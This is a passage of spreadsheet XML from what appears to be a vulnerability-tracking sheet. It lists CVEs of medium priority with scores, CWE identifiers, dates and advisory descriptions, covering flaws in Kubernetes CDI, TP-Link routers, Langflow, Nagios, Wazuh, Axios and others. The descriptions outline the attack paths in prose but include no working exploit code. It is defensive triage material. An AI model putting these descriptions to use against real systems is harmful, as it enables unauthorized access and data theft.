          <t>In containerized-data-importer (CDI), the aggregated cdi.kubevirt.io:view ClusterRole, intended to provide read-only access to CDI resources, includes a rule granting create on the datavolumes/source subresource. CDI's DataVolume clone authorization accepts this permission as sufficient to authorize cloning the contents of any PVC the caller can name, without requiring write access to the source namespace. A user or service account bound to the view role, commonly granted cluster-wide via ClusterRoleBinding, who also has ordinary write access (edit/admin) to any single namespace, can use this to exfiltrate the contents of any PVC in the cluster into a namespace they control, bypassing namespace isolation and the read-only guarantee of the view role.</t>
        </is>
      </c>
      <c r="M2363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17527</t>
        </is>
      </c>
    </row>
    <row r="2364">
      <c r="A2364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18167</t>
        </is>
      </c>
      <c r="C2364" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2364" s="5" t="inlineStr"/>
      <c r="F2364" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2364" s="5" t="inlineStr"/>
      <c r="H2364" s="5" t="inlineStr"/>
      <c r="I2364" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2364" s="5" t="inlineStr"/>
      <c r="K2364" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2364" s="5" t="inlineStr">
        <is>
          <t>A
stack-based buffer overflow vulnerability exists in the EasyMesh module of
TP-Link Archer AX55 v4. When Mesh mode is enabled, a LAN attacker may submit
crafted input that causes the easymesh daemon to crash and may potentially
achieve remote code execution on the device.
Successful
exploitation may cause the EasyMesh daemon to crash and may potentially allow
remote code execution when Mesh mode is enabled. This
may result in high impact to the confidentiality, integrity, and availability
of the affected device.</t>
        </is>
      </c>
      <c r="M2364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18167</t>
        </is>
      </c>
    </row>
    <row r="2365">
      <c r="A2365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18905</t>
        </is>
      </c>
      <c r="C2365" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2365" s="5" t="inlineStr"/>
      <c r="F2365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2365" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2365" s="5" t="inlineStr"/>
      <c r="I2365" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2365" s="5" t="inlineStr"/>
      <c r="K2365" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2365" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway (`mcp-contextforge-gateway`) &lt;= v1.0.6 MCP Context Forge could allow a remote authenticated attacker to obtain sensitive information due to a DNS rebinding vulnerability during tool invocation.</t>
        </is>
      </c>
      <c r="M2365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18905</t>
        </is>
      </c>
    </row>
    <row r="2366">
      <c r="A2366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19118</t>
        </is>
      </c>
      <c r="C2366" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2366" s="5" t="inlineStr"/>
      <c r="F2366" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2366" s="5" t="inlineStr"/>
      <c r="H2366" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="I2366" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2366" s="5" t="inlineStr"/>
      <c r="K2366" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2366" s="5" t="inlineStr">
        <is>
          <t>A time-of-check time-of-use race condition vulnerability was identified in GitHub Enterprise Server that allowed remote code execution. Exploitation required an authenticated user with write access to a repository and precise timing of concurrent upload requests. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.20, 3.18.14, 3.19.11, 3.20.7, and 3.21.5. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="M2366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19118</t>
        </is>
      </c>
    </row>
    <row r="2367">
      <c r="A2367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19283</t>
        </is>
      </c>
      <c r="C2367" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2367" s="5" t="inlineStr"/>
      <c r="F2367" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2367" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2367" s="5" t="inlineStr"/>
      <c r="I2367" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2367" s="5" t="inlineStr"/>
      <c r="K2367" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2367" s="5" t="inlineStr">
        <is>
          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated remote attacker to obtain sensitive information, caused by missing destination namespace validation when copying etcd mTLS client credentials from the openshift-etcd system namespace into an attacker-controlled namespace.</t>
        </is>
      </c>
      <c r="M2367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19283</t>
        </is>
      </c>
    </row>
    <row r="2368">
      <c r="A2368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19304</t>
        </is>
      </c>
      <c r="C2368" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2368" s="5" t="inlineStr"/>
      <c r="F2368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2368" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2368" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2368" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2368" s="5" t="inlineStr"/>
      <c r="K2368" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2368" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information from internal services due to a URL parser discrepancy.</t>
        </is>
      </c>
      <c r="M2368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19304</t>
        </is>
      </c>
    </row>
    <row r="2369">
      <c r="A2369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19306</t>
        </is>
      </c>
      <c r="C2369" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2369" s="5" t="inlineStr"/>
      <c r="F2369" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2369" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2369" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2369" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2369" s="5" t="inlineStr"/>
      <c r="K2369" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2369" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 allows an authenticated attacker to read arbitrary files from the server filesystem — including server secret material (secret_key, JWT signing keys, the application database, /proc/self/environ, and other tenants' upload directories) — by supplying absolute paths or traversal sequences in the files parameter of an authenticated build request. The file contents were embedded as text attachments in the language model prompt and transmitted to the configured model endpoint, resulting in confidential data exfiltration. This bypassed the LANGFLOW_RESTRICT_LOCAL_FILE_ACCESS=true containment boundary, which was enforced for other file-reading components but not for the Chat Input to Message attachment pipeline.</t>
        </is>
      </c>
      <c r="M2369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19306</t>
        </is>
      </c>
    </row>
    <row r="2370">
      <c r="A2370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19397</t>
        </is>
      </c>
      <c r="C2370" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2370" s="5" t="inlineStr"/>
      <c r="F2370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2370" s="5" t="inlineStr"/>
      <c r="H2370" s="5" t="inlineStr"/>
      <c r="I2370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2370" s="5" t="inlineStr"/>
      <c r="K2370" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2370" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for a critical function in ASUS Control Center Express Agent allows an unauthenticated nearby user to control the host via a direct connection to the agent when the host has an active login session.
Refer to the ' 
Security Update for ASUS Control Center Express Agent ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M2370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t>
        </is>
      </c>
    </row>
    <row r="2371">
      <c r="A2371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19584</t>
        </is>
      </c>
      <c r="C2371" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2371" s="5" t="inlineStr"/>
      <c r="F2371" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2371" s="5" t="inlineStr"/>
      <c r="H2371" s="5" t="inlineStr"/>
      <c r="I2371" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2371" s="5" t="inlineStr"/>
      <c r="K2371" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L2371" s="5" t="inlineStr">
        <is>
          <t>Velociraptor allows for the creation of notebook backups in its default enabled daily backup feature. When Velociraptor restores the backup, the notebook cell content is interpolated into a template with no ACL checks. This allows a malicious user with NOTEBOOK_EDITOR permission to plant a VQL query which will be evaluated at elevated permissions if the notebook's backup is subsequently restored.</t>
        </is>
      </c>
      <c r="M2371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19584</t>
        </is>
      </c>
    </row>
    <row r="2372">
      <c r="A2372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23920</t>
        </is>
      </c>
      <c r="C2372" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2372" s="5" t="inlineStr"/>
      <c r="F2372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2372" s="5" t="inlineStr"/>
      <c r="H2372" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I2372" s="5" t="inlineStr">
        <is>
          <t>2026-03-24</t>
        </is>
      </c>
      <c r="J2372" s="5" t="inlineStr"/>
      <c r="K2372" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2372" s="5" t="inlineStr">
        <is>
          <t>Host and event action script input is validated with a regex (set by the administrator), but the validation runs in multiline mode. If ^ and $ anchors are used in user input validation, an injected newline lets authenticated users bypass the check and inject shell commands.</t>
        </is>
      </c>
      <c r="M2372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23920</t>
        </is>
      </c>
    </row>
    <row r="2373">
      <c r="A2373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28802</t>
        </is>
      </c>
      <c r="C2373" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2373" s="5" t="inlineStr"/>
      <c r="F2373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2373" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2373" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I2373" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2373" s="5" t="inlineStr"/>
      <c r="K2373" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2373" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.</t>
        </is>
      </c>
      <c r="M2373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28802</t>
        </is>
      </c>
    </row>
    <row r="2374">
      <c r="A2374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34948</t>
        </is>
      </c>
      <c r="C2374" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2374" s="5" t="inlineStr"/>
      <c r="F2374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2374" s="5" t="inlineStr"/>
      <c r="H2374" s="5" t="inlineStr"/>
      <c r="I2374" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2374" s="5" t="inlineStr"/>
      <c r="K2374" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2374" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, only classes present in the SELECT clause are protected by the silos access check in OQL. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34948</t>
        </is>
      </c>
    </row>
    <row r="2375">
      <c r="A2375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44252</t>
        </is>
      </c>
      <c r="C2375" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2375" s="5" t="inlineStr"/>
      <c r="F2375" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2375" s="5" t="inlineStr"/>
      <c r="H2375" s="5" t="inlineStr"/>
      <c r="I2375" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2375" s="5" t="inlineStr"/>
      <c r="K2375" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2375" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.5, Wazuh Manager allows a low-privilege read-only API user with manager:read permission to retrieve the cluster key from the element in ossec.conf through GET /manager/configuration?raw=true. An attacker with network access to TCP port 1516 can use the disclosed Fernet key to impersonate a cluster worker and submit distributed API requests containing attacker-controlled rbac_permissions with rbac_mode set to black. Because the master trusts the worker-supplied authorization context, the attacker can create users, assign administrator roles, access credentials and API tokens, modify configuration, and execute actions across agents. This issue is fixed in version 4.14.5.</t>
        </is>
      </c>
      <c r="M2375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44252</t>
        </is>
      </c>
    </row>
    <row r="2376">
      <c r="A2376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44293</t>
        </is>
      </c>
      <c r="C2376" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2376" s="5" t="inlineStr"/>
      <c r="F2376" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2376" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2376" s="5" t="inlineStr">
        <is>
          <t>protobufjs_project:protobufjs</t>
        </is>
      </c>
      <c r="I2376" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J2376" s="5" t="inlineStr"/>
      <c r="K2376" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2376" s="5" t="inlineStr">
        <is>
          <t>protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs generated JavaScript for toObject conversion could include an unsafe expression derived from a schema-controlled bytes field default value. A crafted descriptor with a non-string default value for a bytes field could cause attacker-controlled code to be emitted into the generated conversion function. This vulnerability is fixed in 7.5.6 and 8.0.2.</t>
        </is>
      </c>
      <c r="M2376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44293</t>
        </is>
      </c>
    </row>
    <row r="2377">
      <c r="A2377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44495</t>
        </is>
      </c>
      <c r="C2377" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2377" s="5" t="inlineStr"/>
      <c r="F2377" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2377" s="5" t="inlineStr">
        <is>
          <t>java, kubernetes, node.js</t>
        </is>
      </c>
      <c r="H2377" s="5" t="inlineStr">
        <is>
          <t>axios:axios, redhat:advanced_cluster_management_for_kubernetes, redhat:advanced_cluster_security, redhat:ansible_automation_platform, redhat:data_grid, redhat:developer_hub, redhat:discovery, redhat:openshift_container_platform, redhat:openshift_dev_spaces, redhat:openshift_service_mesh</t>
        </is>
      </c>
      <c r="I2377" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2377" s="5" t="inlineStr"/>
      <c r="K2377" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915, CWE-94</t>
        </is>
      </c>
      <c r="L2377" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 0.19.0 to before 0.31.1 and 1.15.2, Axios contains prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted Object.prototype.transformResponse, affected Axios versions may treat that inherited value as request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request. This vulnerability is fixed in 0.31.1 and 1.15.2.</t>
        </is>
      </c>
      <c r="M2377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44495</t>
        </is>
      </c>
    </row>
    <row r="2378">
      <c r="A2378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4598</t>
        </is>
      </c>
      <c r="C2378" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2378" s="5" t="inlineStr"/>
      <c r="F2378" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2378" s="5" t="inlineStr"/>
      <c r="H2378" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I2378" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J2378" s="5" t="inlineStr"/>
      <c r="K2378" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-835</t>
        </is>
      </c>
      <c r="L2378" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Infinite loop via the bnModInverse function in ext/jsbn2.js when the BigInteger.modInverse implementation receives zero or negative inputs, allowing an attacker to hang the process permanently by supplying such crafted values (e.g., modInverse(0, m) or modInverse(-1, m)).</t>
        </is>
      </c>
      <c r="M2378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4598</t>
        </is>
      </c>
    </row>
    <row r="2379">
      <c r="A2379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4602</t>
        </is>
      </c>
      <c r="C2379" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2379" s="5" t="inlineStr"/>
      <c r="F2379" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2379" s="5" t="inlineStr"/>
      <c r="H2379" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I2379" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J2379" s="5" t="inlineStr"/>
      <c r="K2379" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L2379" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Incorrect Conversion between Numeric Types due to handling negative exponents in ext/jsbn2.js. An attacker can force the computation of incorrect modular inverses and break signature verification by calling modPow with a negative exponent.</t>
        </is>
      </c>
      <c r="M2379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4602</t>
        </is>
      </c>
    </row>
    <row r="2380">
      <c r="A2380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48553</t>
        </is>
      </c>
      <c r="C2380" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2380" s="5" t="inlineStr"/>
      <c r="F2380" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2380" s="5" t="inlineStr"/>
      <c r="H2380" s="5" t="inlineStr"/>
      <c r="I2380" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2380" s="5" t="inlineStr"/>
      <c r="K2380" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2380" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.13 and Nagios XI before 2026R1.5 are vulnerable to authenticated remote code execution via custom-variable macro injection through the Nagios Remote Data Processor (NRDP). When a custom variable defined on a host, service, or contact is referenced in a shell-executed command line, an authenticated attacker with NRDP access can inject OS commands through the macro value. Exploitation requires a non-default configuration in which a custom variable is defined and referenced in a shell-executed command.</t>
        </is>
      </c>
      <c r="M2380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48553</t>
        </is>
      </c>
    </row>
    <row r="2381">
      <c r="A2381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48554</t>
        </is>
      </c>
      <c r="C2381" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2381" s="5" t="inlineStr"/>
      <c r="F2381" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2381" s="5" t="inlineStr"/>
      <c r="H2381" s="5" t="inlineStr"/>
      <c r="I2381" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2381" s="5" t="inlineStr"/>
      <c r="K2381" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2381" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 are vulnerable to authenticated remote code execution via unfiltered NOTIFICATION-family macro substitution through the com_data parameter. When a notification command references $NOTIFICATIONCOMMENT$ or $NOTIFICATIONAUTHOR$ in a shell-reachable position, authenticated UI users can run arbitrary commands as the nagios user. Exploitation requires a non-default configuration in which a notification command references these macros in a shell-executed command line.</t>
        </is>
      </c>
      <c r="M2381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48554</t>
        </is>
      </c>
    </row>
    <row r="2382">
      <c r="A2382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53549</t>
        </is>
      </c>
      <c r="C2382" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2382" s="5" t="inlineStr"/>
      <c r="F2382" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2382" s="5" t="inlineStr"/>
      <c r="H2382" s="5" t="inlineStr"/>
      <c r="I2382" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2382" s="5" t="inlineStr"/>
      <c r="K2382" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2382" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the POST /host/db/proxy/test endpoint accepts the singleProxy, proxyChain, and testTarget request fields without validating their destination addresses. The testProxyConnectivity path uses raw TCP and SOCKS connections to attacker-selected hosts and ports, allowing an authenticated user to probe localhost, private networks, link-local metadata services, and other infrastructure reachable from the Termix server. Structured connection errors disclose host reachability and timing information, and successful metadata access can expose cloud credentials. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M2382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53549</t>
        </is>
      </c>
    </row>
    <row r="2383">
      <c r="A2383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53553</t>
        </is>
      </c>
      <c r="C2383" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2383" s="5" t="inlineStr"/>
      <c r="F2383" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2383" s="5" t="inlineStr"/>
      <c r="H2383" s="5" t="inlineStr"/>
      <c r="I2383" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2383" s="5" t="inlineStr"/>
      <c r="K2383" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22</t>
        </is>
      </c>
      <c r="L2383" s="5" t="inlineStr">
        <is>
          <t>Goploy is an open-source automation deployment system. Prior to version 1.18.0, a severe path traversal vulnerability exists in its backend API endpoints, specifically /deploy/fileDiff (File Compare), when handling file paths provided by the client. This issue has been patched in version 1.18.0.</t>
        </is>
      </c>
      <c r="M2383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53553</t>
        </is>
      </c>
    </row>
